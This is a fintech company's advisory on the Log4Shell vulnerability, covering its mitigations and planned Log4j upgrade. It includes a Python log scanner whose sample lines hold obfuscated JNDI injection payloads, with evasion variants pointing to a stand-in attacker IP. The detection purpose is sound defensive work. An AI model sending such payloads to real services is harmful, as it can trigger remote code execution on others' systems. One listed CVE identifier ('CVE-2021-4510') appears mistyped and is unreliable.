General overview

The vulnerability, tracked as CVE-2021-44228 and referred to as “Log4Shell,” affects Java-based applications that use Log4j 2 versions 2.0 through 2.14.1. Log4j 2 is a Java-based logging library that is widely used in business system development, included in various open-source libraries, and directly embedded in major software applications. An attacker who can control log messages or log message parameters (for example by sending a crafted HTTP header or query string that the application logs) can trigger a JNDI lookup against an attacker-controlled LDAP or other JNDI endpoint and execute arbitrary code, provided message lookup substitution is enabled, which it is by default in the affected versions.
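As an added illustration of the mechanism described above (example code written for this page, not APEXX's tooling or Log4j's own code): a small Python scanner that runs over constructed web-server log lines, collapses the nested lookup tricks (${lower:...}, ${upper:...}, ${...:-default}) that attackers used to slip past signatures keyed on the literal ${jndi:, and reports the JNDI scheme in each hit. The log lines and IP addresses are made up, and the function names are this example's own.

```python
import re

# Constructed sample access-log lines (made up for this example, not from any
# real system). The payload can sit in any field the application logs; here it
# is in the request line or the User-Agent.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=${${lower:j}ndi:rmi://203.0.113.7/b} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.7/c}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:ldaps://203.0.113.7/d}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:06 +0000] "GET / HTTP/1.1" 200 512 "-" "${JnDi:${upper:ldap}://203.0.113.7/e}"',
    '10.0.0.3 - - [10/Dec/2021:12:00:07 +0000] "GET /price?item=${basket.total} HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
]

# An innermost lookup: ${...} whose body contains no further "${" or "}".
INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# A JNDI lookup after de-obfuscation; group 1 captures the scheme
# (ldap, ldaps, rmi, dns, ...).
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)[^}]*\}", re.IGNORECASE)


def _resolve_innermost(match):
    """Evaluate one innermost lookup the way Log4j's obfuscation helpers would."""
    body = match.group(1)
    # ${anything:-default} yields the default when the lookup fails, which is
    # exactly what ${::-j} and ${env:NOPE:-j} rely on.
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, sep, value = body.partition(":")
    if sep and prefix.strip().lower() == "lower":
        return value.lower()
    if sep and prefix.strip().lower() == "upper":
        return value.upper()
    # Any other lookup (jndi itself, or an application lookup such as
    # ${basket.total}) is left untouched.
    return match.group(0)


def normalize_lookups(text, max_rounds=16):
    """Collapse nested obfuscation lookups so the literal ${jndi:...} reappears."""
    for _ in range(max_rounds):
        collapsed = INNERMOST_LOOKUP.sub(_resolve_innermost, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def scan_line(line):
    """Return (scheme, normalized lookup) for every JNDI lookup in one log line."""
    normalized = normalize_lookups(line)
    return [(m.group(1).lower(), m.group(0)) for m in JNDI_LOOKUP.finditer(normalized)]


def scan_lines(lines):
    """Return [(line_index, findings)] for every line that carries a JNDI lookup."""
    results = []
    for index, line in enumerate(lines):
        findings = scan_line(line)
        if findings:
            results.append((index, findings))
    return results


if __name__ == "__main__":
    for index, findings in scan_lines(SAMPLE_LOG_LINES):
        for scheme, lookup in findings:
            print(f"line {index}: scheme={scheme} lookup={lookup}")
```

The point of the normalization step is that a WAF or IPS rule keyed on the literal string ${jndi: matches only the first malicious line above; the other four only reveal the lookup once the nested helpers are collapsed. Scanning access logs this way is a detection aid, not a fix: requests that never reach a web-tier log (for example payloads delivered through other logged inputs) are not covered, and only the library upgrade removes the underlying behaviour.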


APEXX response

As soon as Apexx Fintech Limited learned about this vulnerability, a full analysis of hosted systems and applications was performed against the recently published CVE-2021-44228, the Log4j zero-day vulnerability, and the following actions were undertaken:


Mitigating controls:

  • Web Application Firewall rulesets were updated.

  • Intrusion Prevention System signatures were updated.

  • Heightened real-time security monitoring on a 24x7 basis for this specific exploit.

  • Engagement with all critical third-party service providers to assess their response and mitigation controls for these events.


Remediating controls:

In addition, as part of the final remediation, APEXX is currently working on the upgrade to Log4j 2.17.1 for permanent protection against CVE-2021-44228, CVE-2021-45046, CVE-2021-4104, CVE-2021-42550, CVE-2021-4510 and CVE-2021-44832. Note that CVE-2021-4104 concerns Log4j 1.x (JMSAppender) and CVE-2021-42550 concerns Logback rather than Log4j 2, so those two are not closed by the Log4j 2 upgrade itself and need to be handled in the components that carry them. Once our applications are fully tested with this recommended version, the rollout will be performed as per our change control process.


Impact:

There was no impact on the security, confidentiality or integrity of our services, and we have not experienced any degradation in the availability of our services as a result of this vulnerability. We therefore confirm that appropriate precautionary steps have been undertaken to keep our customers safe and protected.